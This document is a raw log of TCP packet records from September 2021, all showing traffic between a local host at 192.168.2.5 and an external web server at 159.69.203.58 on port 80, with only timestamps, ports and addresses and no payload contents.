Sep 25, 2021 10:15:03.725948095 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725948095 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725981951 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726011038 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726011038 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726025105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726032972 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726047993 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726067066 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726080894 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726114988 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726145983 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726150036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726161003 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726178885 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726202965 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726210117 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726217985 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726222992 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726227045 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726252079 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726254940 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726279020 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726304054 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726308107 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726321936 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726330042 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726336002 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726351976 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726371050 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726397038 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726418018 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726422071 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726429939 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726440907 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726454020 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726463079 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726469994 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726471901 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726497889 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726502895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726527929 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726540089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726566076 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726567984 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726598024 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726614952 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726625919 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726633072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726665020 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726695061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726696968 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726706982 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726712942 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726727009 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726761103 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726763010 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726803064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726823092 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726830959 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726835966 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726864100 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726886034 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726888895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726900101 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726907969 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726911068 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726934910 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.726946115 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726954937 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.726985931 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.729340076 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.751729012 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.751761913 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.751823902 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.751827955 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.751853943 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.752027035 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.767436028 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.767545938 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.767612934 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.767632008 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.767669916 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.767693043 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.767720938 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.767853975 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.774297953 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.774333954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.774350882 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.774395943 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.774418116 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.776113987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.897039890 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.921941042 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.921998024 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922039032 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922076941 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922079086 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922097921 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922101021 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922116995 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922121048 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922156096 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922194958 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922199965 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922204971 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922244072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922286034 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922297955 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922301054 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922324896 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922363997 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922364950 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922369003 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922403097 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922441006 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.922446966 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.922452927 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923156977 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923372030 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923437119 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923481941 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923521042 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923538923 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923546076 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923561096 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923573017 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923577070 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923598051 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923643112 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923648119 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923654079 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923697948 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923758030 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923772097 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923777103 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923818111 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923873901 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923878908 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923885107 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923932076 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.923981905 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923986912 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.923988104 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924041986 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924082041 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924094915 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924099922 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924127102 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924180984 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924185991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924189091 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924248934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924302101 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924304962 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924304962 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924360991 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924408913 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924413919 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924413919 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924468994 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924521923 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924521923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924525976 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924578905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924629927 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924633980 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924640894 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924699068 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924753904 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924753904 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924757957 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924815893 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924855947 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924871922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924915075 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924916983 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.924920082 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924969912 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.924973011 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925034046 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925091982 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925097942 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925097942 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925154924 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925204039 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925208092 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925213099 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925266027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925318956 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925333023 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925338984 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925371885 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925419092 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925422907 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925431013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925486088 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925548077 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925554991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925563097 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925605059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925654888 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925659895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925673008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925719976 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925769091 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925771952 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925772905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925827980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925883055 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925884962 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.925888062 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.925945044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926007986 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926038980 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926043987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926067114 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926117897 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926120043 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926122904 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926178932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926233053 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926234961 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926238060 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926290989 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926335096 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926338911 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926341057 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926379919 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926425934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926430941 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926435947 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926469088 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926506996 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926533937 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926538944 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926544905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926583052 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926593065 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926597118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926620007 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926659107 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926668882 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926671982 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926697016 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926743984 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926747084 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926752090 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926788092 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926826954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926841021 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926845074 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926868916 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926909924 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.926938057 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926940918 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.926974058 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927011967 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927026987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927031994 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927048922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927088022 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927098989 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927103996 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927165031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927216053 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927217007 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927222013 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927259922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927298069 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927309990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927313089 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927335978 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927375078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927386045 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927392006 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927412987 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927452087 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927464008 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927468061 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927490950 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927539110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927541971 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927547932 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927582979 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927620888 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927632093 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927634954 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927660942 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927699089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927711010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927714109 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927736044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927773952 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927777052 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927783012 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927812099 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927826881 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927861929 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927912951 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927913904 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927918911 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.927952051 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.927999020 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928000927 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928004026 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928040981 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928080082 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928091049 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928097010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928117990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928158045 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928184032 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928188086 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928195000 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928234100 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928242922 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928246021 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928272009 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928318024 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928322077 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928325891 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928360939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928400040 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928411961 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928415060 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928437948 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928477049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928488016 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928493977 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928514957 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928553104 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928563118 CEST	49744	80	192.168.2.5	159.69.203.58
